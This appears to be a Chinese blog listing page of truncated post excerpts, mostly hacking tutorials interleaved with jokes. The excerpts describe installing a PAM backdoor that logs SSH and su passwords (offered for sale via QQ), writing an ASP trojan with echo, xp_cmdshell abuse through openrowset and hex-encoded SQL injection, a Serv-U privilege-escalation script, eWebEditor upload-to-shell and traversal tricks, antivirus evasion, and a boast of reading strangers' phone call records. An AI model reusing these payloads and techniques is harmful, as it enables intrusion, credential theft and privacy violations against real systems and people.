既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!

    摘要：

  废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606

1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡

我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵

安装
我已经编译好了

安装完毕，那个so穿上去就行了
这是我们的后门

注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。

OK，安装完毕

现在看看他有什么功能

1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下

我们开启

touch     （全文共1002字）——点击此处阅读全文

    摘要：上联 ：八级地震毫无预报  延误几万同胞性命下联 ：六级余震信口开河  折腾千万市民睡觉横批：没搞准过 上联:地震专家不学无术，震前鸦雀无声下联:防震部门急功近利，震后屁话连天横批:震震有词    （全文共211字）——点击此处阅读全文

    摘要：1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：“原来我的灵感好灵的！”

2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。

3.又是语文考试，题目：长江后浪推前浪； 某人答：一代更比一代浪。结果自然是家长又见校长。

4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼， （当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。

5.一题曰“清水出芙蓉”，有人居然答到“乱世出英雄”，或答“山村出美女”，或答“深海出蛟龙”&hel    （全文共1190字）——点击此处阅读全文

    摘要：HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

以下是伪造方法：

ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.dc9.cn/"
Http.send()

PHP(前提是装了curl):

PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "    （全文共2317字）——点击此处阅读全文

    摘要：Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。


文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

1，用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

@echo ^ >up.asp

注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只    （全文共22729字）——点击此处阅读全文

    摘要：

J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞

/WEB-INF../    /WEB-INF..%5C

J2EE的程序访问是通过配置文件里的路径设定实现的，"/xxx.do",并不代表目录下有xxx.do这个文件。

JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）

.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89

关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB    （全文共905字）——点击此处阅读全文

    摘要： 忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！    （全文共38字）——点击此处阅读全文

    摘要：1．关于openrowset和opendatasource

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下：
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')

　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o    （全文共4274字）——点击此处阅读全文

    摘要：Serv-U 6.X 提权脚本
使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在"服务器端口"里填21，然后再在"服务器IP"中填写服务器的真实IP。
复制内容到剪贴板代码:
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(reque    （全文共10323字）——点击此处阅读全文

    摘要：打开eWebEditorNet/upload.aspx，选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。    （全文共117字）——点击此处阅读全文

    摘要：SQL盲注攻击技术综述

1 SQL盲注攻击技术综述 Javaphile
SQL盲注攻击技术综述
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition
of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each
disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to     （全文共13096字）——点击此处阅读全文

    摘要：ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.cnblogs.com/../.. 看到整个网站文件了
    （全文共146字）——点击此处阅读全文

    摘要：首先我说一下如何检测过滤了什么,其实满简单,用and '关键字'='关键字'来判断
如果and 1=1和and 1=2判断有注射的话
and 'a'='a'和and 'a'='b'应该是一样的返回结果,如果出错,说明过滤了单引号,这是个比较简单的判断方法
在不过滤引号的前提下,我们进行其他关键字的判断.
and 'exec'='exec' 正确
说明没有过滤exec,如果过滤了,返回错误.
其他的判断方法就不说了,这个比较简单有效.

再说饶过的办法吧.

1.用16进制来饶过单引号和关键字,这个方法是最普通的
前提是不过滤declare.而且该注射点支持多语句执行
本来不想写了,看看还是写个吧
过程是这样的
xx.asp?id=1;declare @a varchar(8000);select @a=0x6D61737465722E2E78705F636D647368656C6C20276E6574207573657227;exec(@a);--    （全文共1796字）——点击此处阅读全文

    摘要：

 小雨处抓来的！

要移动硬盘里面的aio到别处，老是给NOD32杀，郁闷球。

有没有什么方法能绕过去呢？

方法当然是有的，关键看你有没有创造力了，嘿嘿。

nod32查毒之前会先看看文件的后缀是不是可执行文件，像什么exe，com啦之类的，那要是我自己创造一个可执行文件的格式呢？

闲话少说，看过程：

导出注册表里的.exe子项，然后修改.exe，比如我要增加一个.tt的后缀文件，我可以改成如下的样式：

-------------------------------Cut Here -----------------------------------------------

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.tt]
@="exefile"
"Conte    （全文共1065字）——点击此处阅读全文

    摘要：这回渗透测试项目做的有点意思，通过adsl拨号上网进行黑盒渗透测试发现的这个漏洞至少可以让我得到大量用户手机的支配权(我抽样查询6天时间内就有10000多用户注册）可以查询其中任何人任何时候的通话情况（知道包括什么时间，什么地点与什么地点通话，与哪个手机号通话，通话多长时间等等)，可以用这个来调查他的关系网与地理位置等信息，还可以用他们的手机消费购物，还可以用任何人的手机号码发给任何人任意短信，还可以做很多很多有趣的事：）我把安全界某几位最顶尖高手的手机查了一下，还有几个同事，不过他们的安全意识真不错，有的还改了几次密码，而且挺复杂。    （全文共270字）——点击此处阅读全文